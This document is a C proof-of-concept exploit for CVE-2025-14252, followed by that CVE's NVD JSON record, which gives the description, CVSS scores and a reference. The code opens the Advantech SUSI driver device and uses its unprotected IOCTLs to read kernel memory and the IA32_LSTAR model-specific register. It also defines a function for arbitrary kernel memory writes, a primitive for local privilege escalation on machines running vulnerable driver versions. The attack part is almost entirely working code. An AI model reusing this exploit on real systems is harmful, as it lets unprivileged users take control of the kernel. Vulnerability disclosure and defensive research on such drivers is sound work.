CVE-2025-14252

// CVE-2025-14252 PoC - Advantech SUSI Driver Privilege Escalation // This PoC demonstrates improper access control in susi.sys driver #include <windows.h> #include <stdio.h> #define SUSI_IOCTL_BASE 0x9A406800 #define SUSI_IOCTL_READ_MEMORY (SUSI_IOCTL_BASE + 0x100) #define SUSI_IOCTL_WRITE_MEMORY (SUSI_IOCTL_BASE + 0x104) #define SUSI_IOCTL_READ_MSR (SUSI_IOCTL_BASE + 0x200) #define SUSI_IOCTL_WRITE_MSR (SUSI_IOCTL_BASE + 0x204) // Device name for SUSI driver #define SUSI_DEVICE "\\\\.\\SUSI" typedef struct _SUSI_MEMORY_REQUEST { ULONG64 Address; ULONG64 Value; ULONG Size; } SUSI_MEMORY_REQUEST, *PSUSI_MEMORY_REQUEST; typedef struct _SUSI_MSR_REQUEST { ULONG MsrIndex; ULONG64 Value; } SUSI_MSR_REQUEST, *PSUSI_MSR_REQUEST; HANDLE open_susi_driver() { return CreateFileA(SUSI_DEVICE, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL); } BOOL read_arbitrary_memory(HANDLE hDevice, ULONG64 address, PULONG64 value) { SUSI_MEMORY_REQUEST request = {0}; request.Address = address; request.Size = 8; DWORD bytesReturned = 0; return DeviceIoControl(hDevice, SUSI_IOCTL_READ_MEMORY, &request, sizeof(request), value, sizeof(ULONG64), &bytesReturned, NULL); } BOOL write_arbitrary_memory(HANDLE hDevice, ULONG64 address, ULONG64 value) { SUSI_MEMORY_REQUEST request = {0}; request.Address = address; request.Value = value; request.Size = 8; DWORD bytesReturned = 0; return DeviceIoControl(hDevice, SUSI_IOCTL_WRITE_MEMORY, &request, sizeof(request), NULL, 0, &bytesReturned, NULL); } BOOL read_msr(HANDLE hDevice, ULONG msrIndex, PULONG64 value) { SUSI_MSR_REQUEST request = {0}; request.MsrIndex = msrIndex; DWORD bytesReturned = 0; return DeviceIoControl(hDevice, SUSI_IOCTL_READ_MSR, &request, sizeof(request), value, sizeof(ULONG64), &bytesReturned, NULL); } int main() { printf("[*] CVE-2025-14252 PoC - Advantech SUSI Driver\n"); printf("[*] Improper Access Control in susi.sys\n\n"); HANDLE hDevice = open_susi_driver(); if (hDevice == INVALID_HANDLE_VALUE) { printf("[-] Failed to open SUSI driver\n"); return -1; } printf("[+] Successfully opened SUSI driver\n"); // Demonstrate arbitrary memory read (read kernel memory) ULONG64 kernelAddr = 0xFFFFF78000000000ULL; // Example: Kernel space base ULONG64 readValue = 0; if (read_arbitrary_memory(hDevice, kernelAddr, &readValue)) { printf("[+] Arbitrary kernel memory read successful\n"); printf(" Address: 0x%llx, Value: 0x%llx\n", kernelAddr, readValue); } // Demonstrate MSR read (read IA32_LSTAR MSR - Syscall entry point) ULONG64 msrValue = 0; if (read_msr(hDevice, 0xC0000082, &msrValue)) { // IA32_LSTAR printf("[+] Arbitrary MSR read successful\n"); printf(" MSR 0xC0000082 (IA32_LSTAR): 0x%llx\n", msrValue); } CloseHandle(hDevice); printf("\n[!] This PoC demonstrates the vulnerability.\n"); printf("[!] Real exploitation would involve privilege escalation.\n"); return 0; }

{"cve": {"id": "CVE-2025-14252", "sourceIdentifier": "3ad20294-822c-4ebc-9301-f9a7cf62d46e", "published": "2025-12-16T06:15:42.557", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Improper Access Control vulnerability in Advantech SUSI driver (susi.sys) allows attackers to read/write arbitrary memory, I/O ports, and MSRs, resulting in privilege escalation, arbitrary code execution, and information disclosure. This issue affects Advantech SUSI: 5.0.24335 and prior."}], "metrics": {"cvssMetricV40": [{"source": "3ad20294-822c-4ebc-9301-f9a7cf62d46e", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "3ad20294-822c-4ebc-9301-f9a7cf62d46e", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}], "references": [{"url": "https://www.txone.com/psirt/advisories/CVE-2025-14252", "source": "3ad20294-822c-4ebc-9301-f9a7cf62d46e"}]}}